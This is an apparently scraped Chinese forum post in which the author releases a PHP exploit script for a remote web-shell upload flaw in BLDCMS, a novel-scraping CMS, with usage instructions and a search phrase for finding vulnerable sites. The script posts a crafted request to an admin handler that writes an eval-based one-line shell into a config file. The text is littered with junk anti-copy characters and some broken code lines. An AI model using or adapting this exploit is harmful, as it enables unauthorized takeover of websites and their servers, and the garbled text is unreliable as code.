之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
. q4 G; C( I; W4 ]! s$ E: n/ Z/ z" B8 k( h) ?6 [
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
0 H* p6 b' w- z0 i' t* B+ W
既然都有人发了 我就把我之前写好的EXP放出来吧
/ K H* g( ^5 P! Z6 q4 N
$ N$ j N0 n7 h q3 T" n- q9 o& Eview source print?01.php;">+ g, [+ v& c2 ~: f- q0 P+ E
02.<!--?php
2 V& X, q; @- C1 `9 \$ R03.echo "-------------------------------------------------------------------
5 V9 v8 ]! z7 b- }4 H& P% x04. 4 H ]0 Q% [9 S- w$ E. Q3 s. O
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
. B# x- u: b. y- ?# G06. % J& @ i7 P! y! b3 d7 `
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
- ?) b' S& F: r& M/ e5 Z08. + g- F: y9 z w7 {/ @* [5 e3 k) q
09.QQ:981009941\r\n 2013.3.21\r\n
4 X- B4 E# X- c% S10.
/ i6 r$ M1 {, Z7 c11.
, c% p; c: w8 _12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码1 ]; i0 g* J ]3 G y
13.
0 p4 m6 j9 {! m( Q0 R3 p' F- y14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------# ]! e) ], f# o$ Q' C2 M" b Y% ]/ Y# N
15. 2 @& B+ F: o* I9 b; F8 C/ w
16.--------------------------------------------------------------------\r\n";
, h& C" x% H# [5 b T17.$url=$argv[1];
, s, P* g C8 e! e18.$dir=$argv[2];9 J0 y! q" w1 b+ Z
19.$pass=$argv[3];
! X- B# e. f; ^% Q% j1 h6 A7 A0 a20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
4 `: m8 f7 f! U2 ]" {0 w" U21.if (emptyempty($pass)||emptyempty($url))" Y4 P8 V2 H0 E& x$ m3 S# I% ]* y5 j
22.{exit("请输入参数");}
; c9 b( b, C/ v3 }6 j* H4 C23.else' _. ^$ ?% q" q, f4 x. a0 i
24.{
+ S# H, ~4 j& }4 _* v8 X25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev& ]' }% Z, J3 `8 X! n7 p% Q
26.
0 R, l( g, r5 \( g# I27.al;
' S% Q/ n% I7 L" F* o& |28.$length = strlen($fuckdata);" K$ C# ?1 I9 a! u7 D7 C- z0 @
29.function getshell($url,$pass)
6 N6 f/ E' b! p30.{
( ]+ C' N; X B* p" a31.global $url,$dir,$pass,$eval,$length,$fuckdata;
& w* _" i$ B1 |; ?32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
0 D$ v0 O# e5 J W33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
, @% [/ D; B9 K+ R! \/ _- K* o34.$header .= "User-Agent: MSIE\r\n";
0 E M# h0 S$ K' k( U35.$header .= "Host:".$url."\r\n";. f4 i4 ?1 ]3 f0 I& ?/ @$ D
36.$header .= "Content-Length: ".$length."\r\n";
' @; x/ t( y0 O" E6 H# i37.$header .= "Connection: Close\r\n";) r) H; O# P) @. w
38.$header .="\r\n";
5 e6 w8 Y) m- a39.$header .= $fuckdata."\r\n\r\n";/ ~% t) N& A; r- ?% @& C. i3 h
40.$fp = fsockopen($url, 80,$errno,$errstr,15);0 o; `% p; R$ ~. L* L, _5 h- y; \
41.if (!$fp)1 p7 ?/ C( ^- O8 H; h
42.{0 L( R1 p- ^; [% a& e- M
43.exit ("利用失败:请检查指定目标是否能正常打开");% c8 @) F- J' y8 ]' {$ c; W& b4 ~
44.}( F" v/ [! ~" H7 Z- g* C1 r- A
45.else{ if (!fputs($fp,$header))
% o) O$ x* B4 ]46.{exit ("利用失败");}( ?- K5 s; v& a) J* m! d0 E4 ^
47.else% l: f8 i4 X1 t0 P" V3 L; p+ j. j
48.{0 p" D. X+ N7 ^6 D E3 p
49.$receive = '';
8 j1 k% D4 I" e5 x0 E50.while (!feof($fp)) {! E3 {* G# ?$ b1 q
51.$receive .= @fgets($fp, 1000);8 x! R& U, |# H: {
52.}, b( b3 y; z4 X9 z
53.@fclose($fp);! c$ [# ?( m1 y' p3 ~8 _
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标) Q7 P7 R# X# F
55. G; u- j' }$ U6 l( [% s8 G+ p
56.GPC是否=off)";) s" V* o" [& h8 D$ |
57.}}
# }. W1 T5 g) v58.}
9 E) _' z( J& ?* f' D59.}
; H/ \9 y. H% q% w: f60.getshell($url,$pass);" g1 M, s1 W" y" B4 b) l/ o
61.?-->
1 f! J) y1 [5 w 0 E- x1 y3 @) E$ Q
) i m: o9 V9 W
( ?" Y2 J' u7 u4 F+ U
by 数据流